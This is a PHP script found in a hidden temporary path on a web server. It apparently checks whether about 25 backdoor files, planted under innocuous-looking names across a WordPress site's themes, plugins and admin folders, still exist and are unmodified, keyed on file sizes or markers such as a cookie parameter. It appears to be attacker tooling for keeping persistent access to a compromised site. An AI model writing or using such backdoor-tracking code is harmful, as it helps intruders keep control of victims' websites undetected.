File: //dev/shm/.factor
<?php $r = '/home/roadnlae/public_html'; $x = ["/wp-content/themes/goldy-studio/includes.php"=>"bd@@50549546@@675",
"/wp-admin/edit-link-form.php"=>"bd@@112308909@@_COOKIE[3]",
"/wp-content/plugins/elementor/vendor_prefixed/twig/twig/twig/src/Sandbox/lv.php"=>"bd@@117241812@@1567",
"/wp-content/plugins/elementor/vendor_prefixed/dependency-injection/php-di/phpdoc-reader/src/PhpDocReader/PhpParser/images.php"=>"bd@@112308968@@587",
"/wp-content/themes/astra/inc/builder/type/header/button/dynamic-css/directory.php"=>"bd@@112284397@@2720",
"/wp-content/plugins/foogallery/freemius/includes/fs-essential-functions.php"=>"bd@@122096527@@50",
"/wp-content/themes/newsmash/inc/customizer/controls/code/editor/customizer.page.editor.php"=>"bd@@122096614@@24",
"/wp-content/themes/astra/inc/addons/breadcrumbs/customizer/class-astra-breadcrumbs-configs.php"=>"bd@@122096841@@88",
"/wp-content/plugins/countdown-for-the-events-calendar/admin/events-addon-page/events-addon-page.php"=>"bd@@122096932@@32",
"/wp-content/themes/goldy-mex/inc/kirki/packages/kirki-framework/module-postmessage/src/underEN.php"=>"bd@@122097014@@99",
"/wp-content/themes/goldy-mex/inc/kirki/packages/kirki-framework/module-sections/src/Section_Types/slovenian_mimes.php"=>"bd@@122097028@@2183",
"/wp-content/plugins/elementor/app/modules/import-export-customization/data/routes/base.php"=>"bd@@122097052@@1404",
"/wp-content/plugins/all-in-one-seo-pack/app/Common/Views/sitemap/xsl/connexio.php"=>"bd@@122097057@@714",
"/wp-content/plugins/elementor/modules/atomic-widgets/prop-types/traits/dimensional.prop.type.php"=>"bd@@122097072@@642",
"/wp-content/plugins/elementor/includes/template-library/sources/admin-menu-items/add.templates.menu.menu.php"=>"bd@@122097075@@1561",
"/wp-admin/ms-delete-site.php"=>"bd@@122100782@@1",
"/wp-content/plugins/current-year-shortcode/class.php"=>"bd@@122100852@@16",
"/wp-content/plugins/all-in-one-seo-pack/vendor/woocommerce/action-scheduler/classes/ActionScheduler_QueueCleaner.php"=>"bd@@122101145@@39",
"/wp-content/themes/astra/template-parts/special-banner.php"=>"bd@@122101291@@74",
"/wp-content/plugins/foogallery/includes/extensions/class-extensions-api.php"=>"bd@@122101325@@secure_access",
"/wp-content/themes/goldy-mex/inc/kirki/packages/kirki-framework/control-multicheck/src/Field/flickrrss.php"=>"bd@@122101368@@2349",
"/wp-content/themes/astra/inc/compatibility/edd/customizer/sections/layout/class.astra.edd.archive.product.layout.php"=>"bd@@122101464@@1636",
"/wp-content/plugins/elementor/vendor_prefixed/dependency-injection/php-di/php-di/src/Compiler/editUsers.php"=>"bd@@122101518@@635",
"/wp-content/plugins/elementor/vendor_prefixed/dependency-injection/laravel/serializable-closure/src/Signers/ban.class.php"=>"bd@@122101533@@1597",
"/wp-content/themes/newsmash/inc/customizer/controls/code/control-function/style.functions.php"=>"bd@@122101570@@1693"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');